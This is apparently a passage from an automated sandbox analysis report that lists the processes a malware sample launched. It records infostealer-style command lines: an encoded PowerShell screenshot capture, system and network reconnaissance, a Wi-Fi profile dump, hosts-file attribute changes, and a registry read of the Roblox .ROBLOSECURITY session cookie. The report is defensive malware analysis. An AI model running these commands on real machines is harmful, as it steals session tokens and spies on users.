Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	09:32:32
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	09:32:32
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	09:32:32
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8040, Parent PID: 7976

General

Target ID:	69
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff64baf0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff768620000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff76da80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff658ef0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	09:32:33
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	09:32:34
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	09:32:34
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5188, Parent PID: 2324

General

Target ID:	77
Start time:	09:32:34
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	09:32:34
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	09:32:34
Start date:	04/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff76da80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff62c010000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff62c010000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7772, Parent PID: 7832

General

Target ID:	86
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	09:32:35
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	09:32:36
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: tree.comPID: 7948, Parent PID: 7052

General

Target ID:	89
Start time:	09:32:36
Start date:	04/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff76da80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	09:32:36
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	09:32:36
Start date:	04/10/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff761430000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	09:32:36
Start date:	04/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff623ef0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	09:32:36
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Imagebase:	0x7ff690b30000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	09:32:37
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8140, Parent PID: 7176

General

Target ID:	95
Start time:	09:32:37
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	09:32:37
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	09:32:37
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	09:32:37
Start date:	04/10/2024
